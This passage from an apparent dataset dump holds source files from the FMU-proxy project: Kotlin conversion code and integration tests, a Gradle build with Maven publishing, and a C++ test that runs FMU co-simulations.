\n\n## Software architecture\n\n![Software architecture](http://folk.ntnu.no/laht/files/figures/fmu-proxy.PNG)\n\n\n" }, { "alpha_fraction": 0.7041139006614685, "alphanum_fraction": 0.7072784900665283, "avg_line_length": 27.772727966308594, "blob_id": "fdfb6f9a36c129dd2ad850c24b3944ed1f07e250", "content_id": "28e3e0b8ce3115c93b0190ca4b53b9c7db4d3756", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Kotlin", "length_bytes": 632, "license_type": "permissive", "max_line_length": 118, "num_lines": 22, "path": "/java/FMU-proxy/fmu-proxy/src/test/kotlin/no/mechatronics/sfi/fmuproxy/util.kt", "repo_name": "johanrhodin/FMU-proxy", "src_encoding": "UTF-8", "text": "package no.mechatronics.sfi.fmuproxy\n\nimport no.mechatronics.sfi.fmi4j.common.FmiSimulation\nimport no.mechatronics.sfi.fmi4j.common.FmiStatus\nimport org.junit.jupiter.api.Assertions\nimport kotlin.system.measureTimeMillis\n\n\ninternal inline fun runInstance(instance: FmiSimulation, dt: Double, stop: Double, callback: () -> Unit = {}) : Long {\n\n instance.init()\n Assertions.assertEquals(FmiStatus.OK, instance.lastStatus)\n\n return measureTimeMillis {\n while (instance.currentTime < stop) {\n val status = instance.doStep(dt)\n Assertions.assertTrue(status)\n callback()\n }\n }\n\n}" }, { "alpha_fraction": 0.6903026103973389, "alphanum_fraction": 0.6918489336967468, "avg_line_length": 37.85407638549805, "blob_id": "6b256580b68d00edea26002ae34185dad92b54a8", "content_id": "c86c07029864f05078fd9c110ce405c95e81946c", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Kotlin", "length_bytes": 9054, "license_type": "permissive", "max_line_length": 124, "num_lines": 233, "path": "/java/FMU-proxy/fmu-proxy/src/main/kotlin/no/mechatronics/sfi/fmuproxy/grpc/services/extensions.kt", "repo_name": "johanrhodin/FMU-proxy", "src_encoding": "UTF-8", "text": "/*\n * The MIT License\n *\n * Copyright 2017-2018 Norwegian University of Technology (NTNU)\n *\n * Permission is hereby granted, free of charge, to any person obtaining a copy\n * of this software and associated documentation files (the \"Software\"), to deal\n * in the Software without restriction, including without limitation the rights\n * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n * copies of the Software, and to permit persons to whom the Software is\n * furnished to do so, subject to the following conditions:\n *\n * The above copyright notice and this permission notice shall be included in\n * all copies or substantial portions of the Software.\n *\n * THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. 
IN NO EVENT SHALL THE\n * AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN\n * THE SOFTWARE.\n */\n\npackage no.mechatronics.sfi.fmuproxy.grpc.services\n\nimport no.mechatronics.sfi.fmi4j.common.FmiStatus\nimport no.mechatronics.sfi.fmi4j.modeldescription.CommonModelDescription\nimport no.mechatronics.sfi.fmi4j.modeldescription.structure.DependenciesKind\nimport no.mechatronics.sfi.fmi4j.modeldescription.structure.ModelStructure\nimport no.mechatronics.sfi.fmi4j.modeldescription.structure.Unknown\nimport no.mechatronics.sfi.fmi4j.modeldescription.variables.*\nimport no.mechatronics.sfi.fmuproxy.grpc.Proto\n\ninternal fun FmiStatus.protoType(): Proto.Status {\n return when (this) {\n FmiStatus.OK -> Proto.Status.OK_STATUS\n FmiStatus.Warning -> Proto.Status.WARNING_STATUS\n FmiStatus.Discard -> Proto.Status.DISCARD_STATUS\n FmiStatus.Error -> Proto.Status.ERROR_STATUS\n FmiStatus.Fatal -> Proto.Status.FATAL_STATUS\n FmiStatus.Pending -> Proto.Status.PENDING_STATUS\n FmiStatus.NONE -> Proto.Status.UNRECOGNIZED\n }\n}\n\ninternal fun CommonModelDescription.protoType(): Proto.ModelDescription {\n\n return Proto.ModelDescription.newBuilder().also { builder ->\n\n builder.guid = guid\n builder.modelName = modelName\n builder.fmiVersion = fmiVersion\n builder.modelStructure = modelStructure.protoType()\n builder.addAllModelVariables(modelVariables.map { it.protoType() })\n license?.also { builder.license = it }\n copyright?.also { builder.copyright = it }\n author?.also { builder.author = it }\n version?.also { builder.version = it }\n license?.also { builder.license = it }\n generationTool?.also { builder.generationTool = it }\n generationDateAndTime?.also { builder.generationDateAndTime = it }\n\n }.build()\n\n}\n\ninternal fun IntegerVariable.protoType(): Proto.IntegerAttribute {\n return Proto.IntegerAttribute.newBuilder().also {builder ->\n min?.also { builder.min = it }\n max?.also { builder.max = it }\n start?.also { builder.start = it }\n }.build()\n}\n\ninternal fun RealVariable.protoType(): Proto.RealAttribute {\n return Proto.RealAttribute.newBuilder().also {builder ->\n min?.also { builder.min = it }\n max?.also { builder.max = it }\n start?.also { builder.start = it }\n }.build()\n}\n\ninternal fun StringVariable.protoType(): Proto.StringAttribute {\n return Proto.StringAttribute.newBuilder().also {builder ->\n start?.also { builder.start = it }\n }.build()\n}\n\ninternal fun BooleanVariable.protoType(): Proto.BooleanAttribute {\n return Proto.BooleanAttribute.newBuilder().also {builder ->\n start?.also { builder.start = it }\n }.build()\n}\n\ninternal fun EnumerationVariable.protoType(): Proto.EnumerationAttribute {\n return Proto.EnumerationAttribute.newBuilder().also {builder ->\n min?.also { builder.min = it }\n max?.also { builder.max = it }\n start?.also { builder.start = it }\n }.build()\n}\n\ninternal fun TypedScalarVariable<*>.protoType() : Proto.ScalarVariable {\n return Proto.ScalarVariable.newBuilder().also { builder ->\n\n builder.name = name\n builder.valueReference = valueReference\n\n declaredType?.also { builder.declaredType = it }\n description?.also { builder.description = it }\n causality?.also { builder.causality = it.protoType() }\n variability?.also { builder.variability = it.protoType() }\n initial?.also { builder.initial = it.protoType() }\n\n when (this) {\n is IntegerVariable -> 
builder.integerAttribute = this.protoType()\n is RealVariable -> builder.realAttribute = this.protoType()\n is StringVariable -> builder.stringAttribute = this.protoType()\n is BooleanVariable -> builder.booleanAttribute = this.protoType()\n is EnumerationVariable -> builder.enumerationAttribute = this.protoType()\n else -> throw AssertionError()\n }\n\n }.build()\n\n}\n\n\ninternal fun Double.protoType(): Proto.Real {\n return Proto.Real.newBuilder().setValue(this).build()\n}\n\ninternal fun Boolean.protoType(): Proto.Bool {\n return Proto.Bool.newBuilder().setValue(this).build()\n}\n\ninternal fun ModelStructure.protoType(): Proto.ModelStructure {\n return Proto.ModelStructure.newBuilder()\n .addAllOutputs(outputs.map { it.protoType() })\n .addAllDerivatives(derivatives.map { it.protoType() })\n .addAllInitialUnknowns(initialUnknowns.map { it.protoType() })\n .build()\n}\n\ninternal fun Unknown.protoType(): Proto.Unknown {\n return Proto.Unknown.newBuilder().also { builder ->\n builder.index = index\n builder.addAllDependencies(dependencies)\n\n dependenciesKind?.also { builder.dependenciesKind = it.protoType() }\n\n }.build()\n}\n\ninternal fun DependenciesKind.protoType(): Proto.DependenciesKind {\n\n return when (this) {\n DependenciesKind.CONSTANT -> Proto.DependenciesKind.CONSTANT_KIND\n DependenciesKind.DEPENDENT -> Proto.DependenciesKind.DEPENDENT_KIND\n DependenciesKind.DISCRETE -> Proto.DependenciesKind.DISCRETE_KIND\n DependenciesKind.TUNABLE -> Proto.DependenciesKind.TUNABLE_KIND\n else -> Proto.DependenciesKind.UNRECOGNIZED\n }\n\n}\n\ninternal fun Causality.protoType(): Proto.Causality {\n\n return when (this) {\n Causality.INPUT -> Proto.Causality.INPUT_CAUSALITY\n Causality.OUTPUT -> Proto.Causality.OUTPUT_CAUSALITY\n Causality.CALCULATED_PARAMETER -> Proto.Causality.CALCULATED_PARAMETER_CAUSALITY\n Causality.PARAMETER -> Proto.Causality.PARAMETER_CAUSALITY\n Causality.LOCAL -> Proto.Causality.LOCAL_CAUSALITY\n Causality.INDEPENDENT -> Proto.Causality.INDEPENDENT_CAUSALITY\n else -> Proto.Causality.UNRECOGNIZED\n }\n\n}\n\ninternal fun Variability.protoType(): Proto.Variability {\n\n return when (this) {\n Variability.CONSTANT -> Proto.Variability.CONSTANT_VARIABILITY\n Variability.CONTINUOUS -> Proto.Variability.CONTINUOUS_VARIABILITY\n Variability.DISCRETE -> Proto.Variability.DISCRETE_VARIABILITY\n Variability.FIXED -> Proto.Variability.FIXED_VARIABILITY\n Variability.TUNABLE -> Proto.Variability.TUNABLE_VARIABILITY\n else -> Proto.Variability.UNRECOGNIZED\n }\n\n}\n\ninternal fun Initial.protoType(): Proto.Initial {\n\n return when (this) {\n Initial.CALCULATED -> Proto.Initial.CALCULATED_INITIAL\n Initial.EXACT -> Proto.Initial.EXACT_INITIAL\n Initial.APPROX -> Proto.Initial.APPROX_INITIAL\n else -> Proto.Initial.UNRECOGNIZED\n }\n\n}\n\n//internal fun TypedScalarVariable<*>.protoStartType(): Proto.AnyPrimitive {\n// return if (start != null) {\n// Proto.AnyPrimitive.newBuilder().also { builder ->\n// when (this) {\n// is IntegerVariable -> builder.intValue = start!!\n// is RealVariable -> builder.realValue = start!!\n// is StringVariable -> builder.strValue = start\n// is BooleanVariable -> builder.boolValue = start!!\n// is EnumerationVariable -> builder.enumValue = start!!\n// else -> throw UnsupportedOperationException(\"Variable type not supported: ${this::class.java.simpleName}\")\n// }\n// }.build()\n//\n// } else {\n// Proto.AnyPrimitive.getDefaultInstance()\n// }\n//}\n\n//internal fun TypedScalarVariable<*>.protoVariableType(): Proto.VariableType {\n// 
return when(this) {\n// is IntegerVariable -> Proto.VariableType.INTEGER_VARIABLE\n// is RealVariable -> Proto.VariableType.REAL_VARIABLE\n// is StringVariable -> Proto.VariableType.STRING_VARIABLE\n// is BooleanVariable -> Proto.VariableType.BOOLEAN_VARIABLE\n// is EnumerationVariable -> Proto.VariableType.ENUMERATION_VARIABLE\n// else -> throw UnsupportedOperationException(\"$this is not a supported variable type!\")\n// }\n//}\n\n" }, { "alpha_fraction": 0.6324833631515503, "alphanum_fraction": 0.6371951103210449, "avg_line_length": 30.65350914001465, "blob_id": "e93797266702056877d411aa8e689632ed36164c", "content_id": "98cd80bd94b7e593e26df886435627eafd257eb8", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Kotlin", "length_bytes": 7216, "license_type": "permissive", "max_line_length": 122, "num_lines": 228, "path": "/java/FMU-proxy/fmu-proxy/src/test/kotlin/no/mechatronics/sfi/fmuproxy/TestProxy.kt", "repo_name": "johanrhodin/FMU-proxy", "src_encoding": "UTF-8", "text": "package no.mechatronics.sfi.fmuproxy\n\nimport info.laht.yajrpc.RpcHandler\nimport info.laht.yajrpc.net.http.RpcHttpClient\nimport info.laht.yajrpc.net.tcp.RpcTcpClient\nimport info.laht.yajrpc.net.ws.RpcWebSocketClient\nimport info.laht.yajrpc.net.zmq.RpcZmqClient\nimport no.mechatronics.sfi.fmi4j.common.FmiSimulation\nimport no.mechatronics.sfi.fmi4j.common.FmiStatus\nimport no.mechatronics.sfi.fmi4j.fmu.Fmu\nimport no.mechatronics.sfi.fmuproxy.avro.AvroFmuClient\nimport no.mechatronics.sfi.fmuproxy.avro.AvroFmuServer\nimport no.mechatronics.sfi.fmuproxy.grpc.GrpcFmuClient\nimport no.mechatronics.sfi.fmuproxy.grpc.GrpcFmuServer\nimport no.mechatronics.sfi.fmuproxy.jsonrpc.*\nimport no.mechatronics.sfi.fmuproxy.jsonrpc.service.RpcFmuService\nimport no.mechatronics.sfi.fmuproxy.net.FmuProxyServer\nimport no.mechatronics.sfi.fmuproxy.thrift.ThriftFmuClient\nimport no.mechatronics.sfi.fmuproxy.thrift.ThriftFmuServer\nimport org.junit.jupiter.api.AfterAll\nimport org.junit.jupiter.api.Assertions\nimport org.junit.jupiter.api.Test\nimport org.junit.jupiter.api.TestInstance\nimport org.junit.jupiter.api.condition.EnabledIfEnvironmentVariable\nimport org.slf4j.Logger\nimport org.slf4j.LoggerFactory\nimport java.io.File\nimport kotlin.system.measureTimeMillis\n\n@TestInstance(TestInstance.Lifecycle.PER_CLASS)\n@EnabledIfEnvironmentVariable(named = \"TEST_FMUs\", matches = \".*\")\nclass TestProxy {\n\n companion object {\n\n val LOG: Logger = LoggerFactory.getLogger(TestProxy::class.java)\n\n private const val stepSize: Double = 1.0 / 100\n private const val stopTime: Double = 5.0\n\n private const val httpPort: Int = 8003\n private const val wsPort: Int = 8004\n private const val tcpPort: Int = 8005\n private const val zmqPort: Int = 8006\n\n }\n\n private val fmu: Fmu\n private val proxy: FmuProxy\n\n private val grpcServer: FmuProxyServer\n private val avroServer: FmuProxyServer\n private val thriftServer: FmuProxyServer\n\n init {\n\n fmu = Fmu.from(File(TestUtils.getTEST_FMUs(),\n \"FMI_2.0/CoSimulation/${TestUtils.getOs()}/OpenModelica/v1.11.0/WaterTank_Control/WaterTank_Control.fmu\"))\n\n grpcServer = GrpcFmuServer(fmu)\n avroServer = AvroFmuServer(fmu)\n thriftServer = ThriftFmuServer(fmu)\n\n proxy = FmuProxyBuilder(fmu).apply {\n addServer(grpcServer)\n addServer(thriftServer)\n addServer(avroServer)\n RpcHandler(RpcFmuService(fmu)).also { handler ->\n addServer(FmuProxyJsonHttpServer(handler), httpPort)\n addServer(FmuProxyJsonWsServer(handler), wsPort)\n 
addServer(FmuProxyJsonTcpServer(handler), tcpPort)\n addServer(FmuProxyJsonZmqServer(handler), zmqPort)\n }\n\n }.build()\n\n proxy.start()\n LOG.info(\"${proxy.networkInfo}\")\n\n }\n\n @AfterAll\n fun tearDown() {\n proxy.stop()\n fmu.close()\n }\n\n\n @Test\n fun testGetPort() {\n Assertions.assertEquals(httpPort, proxy.getPortFor<FmuProxyJsonHttpServer>())\n Assertions.assertEquals(wsPort, proxy.getPortFor<FmuProxyJsonWsServer>())\n Assertions.assertEquals(tcpPort, proxy.getPortFor<FmuProxyJsonTcpServer>())\n Assertions.assertEquals(zmqPort, proxy.getPortFor<FmuProxyJsonZmqServer>())\n }\n\n @Test\n fun getServer() {\n Assertions.assertEquals(grpcServer, proxy.getServer<GrpcFmuServer>())\n Assertions.assertEquals(avroServer, proxy.getServer<AvroFmuServer>())\n Assertions.assertEquals(thriftServer, proxy.getServer<ThriftFmuServer>())\n }\n\n private fun runInstance(instance: FmiSimulation) : Long {\n\n instance.init()\n Assertions.assertEquals(FmiStatus.OK, instance.lastStatus)\n\n return measureTimeMillis {\n while (instance.currentTime < stopTime) {\n val status = instance.doStep(stepSize)\n Assertions.assertTrue(status)\n }\n }\n\n }\n\n @Test\n fun testGrpc() {\n\n proxy.getPortFor<GrpcFmuServer>()?.also { port ->\n\n GrpcFmuClient(\"localhost\", port).use { client ->\n\n val mdLocal = fmu.modelDescription\n val mdRemote = client.modelDescription\n\n Assertions.assertEquals(mdLocal.guid, mdRemote.guid)\n Assertions.assertEquals(mdLocal.modelName, mdRemote.modelName)\n Assertions.assertEquals(mdLocal.fmiVersion, mdRemote.fmiVersion)\n\n client.newInstance().use { instance ->\n\n runInstance(instance).also {\n LOG.info(\"gRPC duration: ${it}ms\")\n }\n\n }\n }\n }\n\n }\n\n @Test\n fun testThrift() {\n\n proxy.getPortFor<ThriftFmuServer>()?.also { port ->\n ThriftFmuClient(\"localhost\", port).use { client ->\n\n val mdLocal = fmu.modelDescription\n val mdRemote = client.modelDescription\n\n Assertions.assertEquals(mdLocal.guid, mdRemote.guid)\n Assertions.assertEquals(mdLocal.modelName, mdRemote.modelName)\n Assertions.assertEquals(mdLocal.fmiVersion, mdRemote.fmiVersion)\n\n client.newInstance().use { instance ->\n\n runInstance(instance).also {\n LOG.info(\"Thrift duration: ${it}ms\")\n }\n\n }\n }\n }\n\n }\n\n @Test\n fun testAvro() {\n\n proxy.getPortFor<AvroFmuServer>()?.also { port ->\n AvroFmuClient(\"localhost\", port).use { client ->\n\n val mdLocal = fmu.modelDescription\n val mdRemote = client.modelDescription\n\n Assertions.assertEquals(mdLocal.guid, mdRemote.guid)\n Assertions.assertEquals(mdLocal.modelName, mdRemote.modelName)\n Assertions.assertEquals(mdLocal.fmiVersion, mdRemote.fmiVersion)\n\n client.newInstance().use { instance ->\n\n runInstance(instance).also {\n LOG.info(\"Avro duration: ${it}ms\")\n }\n\n }\n }\n }\n\n }\n\n @Test\n fun testJsonRpc() {\n\n val host = \"localhost\"\n val clients = listOf(\n RpcHttpClient(host, proxy.getPortFor<FmuProxyJsonHttpServer>()!!),\n RpcWebSocketClient(host, proxy.getPortFor<FmuProxyJsonWsServer>()!!),\n RpcTcpClient(host, proxy.getPortFor<FmuProxyJsonTcpServer>()!!),\n RpcZmqClient(host, proxy.getPortFor<FmuProxyJsonZmqServer>()!!)\n ).map { JsonRpcFmuClient(it) }\n\n\n val md = fmu.modelDescription\n\n clients.forEach { client ->\n\n LOG.info(\"Testing client of type ${client.javaClass.simpleName}\")\n\n Assertions.assertEquals(md.guid, client.guid)\n Assertions.assertEquals(md.modelName, client.modelName)\n Assertions.assertEquals(md.fmiVersion, client.fmiVersion)\n\n client.newInstance().use { instance ->\n\n 
runInstance(instance).also {\n LOG.info(\"${client.javaClass.simpleName} duration: ${it}ms\")\n }\n\n }\n\n }\n\n }\n\n}" }, { "alpha_fraction": 0.5728408098220825, "alphanum_fraction": 0.5827262997627258, "avg_line_length": 27.894737243652344, "blob_id": "a58fc718971e9a40c9c964ffc2e3ccd46402b58c", "content_id": "fd2831dfeaaad158901ac6e33da451dc07e373b9", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Gradle", "length_bytes": 3844, "license_type": "permissive", "max_line_length": 148, "num_lines": 133, "path": "/java/FMU-proxy/rpc-definitions/build.gradle", "repo_name": "johanrhodin/FMU-proxy", "src_encoding": "UTF-8", "text": "\nplugins {\n id \"com.google.protobuf\" version \"0.8.5\"\n id \"org.jruyi.thrift\" version \"0.4.0\"\n id \"com.commercehub.gradle.plugin.avro-base\" version \"0.14.1\"\n}\n\napply plugin: 'maven'\napply plugin: 'signing'\n\ngroup = 'no.mechatronics.sfi.fmuproxy'\nversion = '0.1-SNAPSHOT'\n\ndef definitions = \"../../../rpc-definitions\"\n\ndependencies {\n compile group: 'org.apache.thrift', name: 'libthrift', version: '0.11.0'\n\n compile group: 'io.grpc', name: 'grpc-stub', version: '1.12.0'\n compile group: 'io.grpc', name: 'grpc-protobuf', version: '1.12.0'\n\n compile group: 'org.apache.avro', name: 'avro', version: '1.8.2'\n compile group: 'org.apache.avro', name: 'avro-ipc', version: '1.8.2'\n}\n\navro {\n fieldVisibility = \"PRIVATE\"\n}\n\ntask generateAvroProtocol(type: com.commercehub.gradle.plugin.avro.GenerateAvroProtocolTask) {\n source(\"${definitions}/avro\")\n outputDir = file(\"build/avpr\")\n}\n\ntask generateAvro(type: com.commercehub.gradle.plugin.avro.GenerateAvroJavaTask) {\n source(\"build/avpr\")\n outputDir = file(\"build/avro\")\n}\ngenerateAvro.dependsOn(generateAvroProtocol)\ncompileJava.source(generateAvro.outputs)\n\nprotobuf {\n generatedFilesBaseDir = \"$projectDir/build\"\n protoc {\n artifact = 'com.google.protobuf:protoc:3.5.1'\n }\n plugins {\n grpc {\n artifact = 'io.grpc:protoc-gen-grpc-java:1.12.0'\n }\n }\n generateProtoTasks {\n\n ofSourceSet('main')*.plugins {\n grpc {\n outputSubDir = 'java'\n }\n }\n }\n\n}\n\nsourceSets {\n main {\n proto {\n srcDir \"${definitions}/proto\"\n }\n }\n}\n\nimport org.apache.tools.ant.taskdefs.condition.Os\n\ndef thriftPath = System.getenv(\"THRIFT_COMPILER\")\ndef supportsThrift = Os.isFamily(Os.FAMILY_WINDOWS) && thriftPath != null\n\nif (supportsThrift) {\n compileThrift {\n thriftExecutable \"$thriftPath/thrift.exe\"\n createGenFolder false\n generator 'java', 'private-members'\n sourceItems \"${definitions}/thrift\"\n }\n} else {\n logger.warn(\"Cannot generate Thrift sources! OS is Windows? 
Location of Thrift.exe specified by THRIFT_COMPILER added to ENVIRONMENT variable?\")\n}\n\nsigning {\n sign configurations.archives\n}\n\nuploadArchives {\n repositories {\n mavenDeployer {\n beforeDeployment { MavenDeployment deployment -> signing.signPom(deployment) }\n\n repository(url: \"https://oss.sonatype.org/service/local/staging/deploy/maven2\") {\n authentication(userName: ossrhUsername, password: ossrhPassword)\n }\n\n snapshotRepository(url: \"https://oss.sonatype.org/content/repositories/snapshots\") {\n authentication(userName: ossrhUsername, password: ossrhPassword)\n }\n\n pom.project {\n name archivesBaseName\n packaging 'jar'\n // optionally artifactId can be defined here\n description 'Generated thrift sources for use by FMU-proxy'\n url 'https://github.com/SFI-Mechatronics/gRPC-FMU'\n\n scm {\n connection 'scm:git:git://github.com/SFI-Mechatronics/gRPC-FMU.git'\n developerConnection 'scm:git:ssh://github.com/SFI-Mechatronics/gRPC-FMU.git'\n url 'https://github.com/SFI-Mechatronics/gRPC-FMU/tree/master'\n }\n\n licenses {\n license {\n name 'The MIT License'\n url 'https://opensource.org/licenses/mit-license.php'\n }\n }\n\n developers {\n developer {\n id 'laht'\n name 'Lars Ivar Hatledal'\n email '[email protected]'\n }\n }\n }\n }\n }\n}\n" }, { "alpha_fraction": 0.6859503984451294, "alphanum_fraction": 0.7028728723526001, "avg_line_length": 30.75, "blob_id": "4b5127cbc3541f73d97ddd49926f3ec5e5925de9", "content_id": "017cd6624600d9468fe39b747fe9a6657d03f1dd", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 2541, "license_type": "permissive", "max_line_length": 121, "num_lines": 80, "path": "/cpp/FMU-proxy/test/FmuTest.cpp", "repo_name": "johanrhodin/FMU-proxy", "src_encoding": "UTF-8", "text": "/*\n * The MIT License\n *\n * Copyright 2017-2018 Norwegian University of Technology\n *\n * Permission is hereby granted, free of charge, to any person obtaining a copy\n * of this software and associated documentation files (the \"Software\"), to deal\n * in the Software without restriction, including without limitation the rights\n * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n * copies of the Software, and to permit persons to whom the Software is\n * furnished to do so, subject to the following conditions:\n *\n * The above copyright notice and this permission notice shall be included in\n * all copies or substantial portions of the Software.\n *\n * THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. 
IN NO EVENT SHALL THE\n * AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN\n * THE SOFTWARE.\n */\n\n#include <iostream>\n\n#include <boost/filesystem.hpp>\n\n#include <fmilib.h>\n\n#include \"../common/FmuWrapper.h\"\n#include \"../common/thrift-gen/definitions_types.h\"\n\nusing namespace std;\nusing namespace fmuproxy;\nusing namespace boost::filesystem;\n\n\nint main(int argc, char **argv) {\n\n string fmu_path = string(string(getenv(\"TEST_FMUs\")))\n + \"/FMI_2.0/CoSimulation/linux64/20sim/4.6.4.8004/ControlledTemperature/ControlledTemperature.fmu\";\n\n FmuWrapper fmu = FmuWrapper(fmu_path.c_str());\n\n auto md = fmu.getModelDescription();\n cout << md->defaultExperiment << endl;\n\n for (auto var : md->modelVariables) {\n cout << var.attribute.realAttribute << endl;\n }\n\n shared_ptr<FmuInstance> instance1 = fmu.newInstance();\n shared_ptr<FmuInstance> instance2 = fmu.newInstance();\n\n instance1->init(0.0, -1);\n instance2->init(0.0, -1);\n\n RealRead read;\n\n instance1->getReal(\"Temperature_Room\", read);\n cout << \"Temperature_Room=\" << read.value << endl;\n double dt = 1.0/100;\n\n StepResult result;\n instance1->step(dt, result);\n\n instance1->getReal(\"Temperature_Room\", read);\n cout << \"Temperature_Room=\" << read.value << endl;\n\n instance1->terminate();\n\n instance2->getReal(\"Temperature_Room\", read);\n cout << \"Temperature_Room=\" << read.value << endl;\n\n instance2->terminate();\n\n return 0;\n\n}\n\n" }, { "alpha_fraction": 0.6456289887428284, "alphanum_fraction": 0.6507462859153748, "avg_line_length": 27.609756469726562, "blob_id": "081ae708e00ba5917a3478b7836c7d9ee9b973aa", "content_id": "5ae56eac16939b0331ffc1079dfc97ec181855e7", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Kotlin", "length_bytes": 2345, "license_type": "permissive", "max_line_length": 81, "num_lines": 82, "path": "/java/FMU-proxy/fmu-proxy/src/main/kotlin/no/mechatronics/sfi/fmuproxy/fmu/Fmus.kt", "repo_name": "johanrhodin/FMU-proxy", "src_encoding": "UTF-8", "text": "/*\n * The MIT License\n *\n * Copyright 2017-2018. Norwegian University of Technology\n *\n * Permission is hereby granted, free of charge, to any person obtaining a copy\n * of this software and associated documentation files (the \"Software\"), to deal\n * in the Software without restriction, including without limitation the rights\n * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n * copies of the Software, and to permit persons to whom the Software is\n * furnished to do so, subject to the following conditions:\n *\n * The above copyright notice and this permission notice shall be included in\n * all copies or substantial portions of the Software.\n *\n * THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. 
IN NO EVENT SHALL THE\n * AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN\n * THE SOFTWARE.\n */\n\npackage no.mechatronics.sfi.fmuproxy.fmu\n\n\nimport no.mechatronics.sfi.fmi4j.common.FmiSimulation\nimport org.slf4j.Logger\nimport org.slf4j.LoggerFactory\nimport java.util.concurrent.atomic.AtomicInteger\n\n/**\n * @author Lars Ivar Hatledal\n */\nobject Fmus {\n\n private val LOG: Logger = LoggerFactory.getLogger(Fmus::class.java)\n\n private val idGen = AtomicInteger(0)\n private val fmus = mutableMapOf<Int, FmiSimulation>()\n\n init {\n Runtime.getRuntime().addShutdownHook(Thread {\n terminateAll()\n })\n }\n\n fun put(fmu: FmiSimulation): Int {\n return idGen.incrementAndGet().also {\n fmus[it] = fmu\n }\n }\n\n fun remove(id: Int): FmiSimulation? {\n return fmus.remove(id).also {\n if (it == null) {\n LOG.warn(\"No fmu with id: $id\")\n }\n }\n }\n\n fun get(id: Int): FmiSimulation? {\n return fmus[id].also {\n if (it == null) {\n LOG.warn(\"No fmu with id: $id\")\n }\n }\n }\n\n\n fun terminateAll() {\n fmus.values.forEach {\n if (!it.isTerminated) {\n it.terminate()\n }\n }\n }\n\n\n\n}" }, { "alpha_fraction": 0.6428015828132629, "alphanum_fraction": 0.6463034749031067, "avg_line_length": 34.16438293457031, "blob_id": "1cebf6cd6ed6356355ed76eb4d7acd8d484a0825", "content_id": "0f12f9e7ed21feaa5f9a96212b6e749eb07c161d", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Kotlin", "length_bytes": 2570, "license_type": "permissive", "max_line_length": 81, "num_lines": 73, "path": "/java/FMU-proxy/fmu-proxy-gen/src/main/kotlin/no/mechatronics/sfi/fmuproxy/utils/utils.kt", "repo_name": "johanrhodin/FMU-proxy", "src_encoding": "UTF-8", "text": "/*\n * The MIT License\n *\n * Copyright 2017-2018 Norwegian University of Technology (NTNU)\n *\n * Permission is hereby granted, free of charge, to any person obtaining a copy\n * of this software and associated documentation files (the \"Software\"), to deal\n * in the Software without restriction, including without limitation the rights\n * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n * copies of the Software, and to permit persons to whom the Software is\n * furnished to do so, subject to the following conditions:\n *\n * The above copyright notice and this permission notice shall be included in\n * all copies or substantial portions of the Software.\n *\n * THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. 
IN NO EVENT SHALL THE\n * AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN\n * THE SOFTWARE.\n */\n\npackage no.mechatronics.sfi.fmuproxy.utils\n\nimport no.mechatronics.sfi.fmi4j.modeldescription.variables.*\nimport java.io.File\nimport java.io.FileOutputStream\nimport java.io.InputStream\nimport java.util.zip.ZipEntry\nimport java.util.zip.ZipInputStream\n\n\ninternal fun isArray(name: String) : Boolean {\n return \"[\" in name && \"]\" in name\n}\n\ninternal fun getProtoType(variable: TypedScalarVariable<*>): String {\n\n return when (variable) {\n is IntegerVariable -> \"Int\"\n is RealVariable -> \"Real\"\n is StringVariable -> \"Str\"\n is BooleanVariable -> \"Bool\"\n is EnumerationVariable -> \"Int\"\n else -> throw RuntimeException()\n }\n\n}\n\ninternal fun copyZippedContent(baseFile: File, content: InputStream) {\n\n 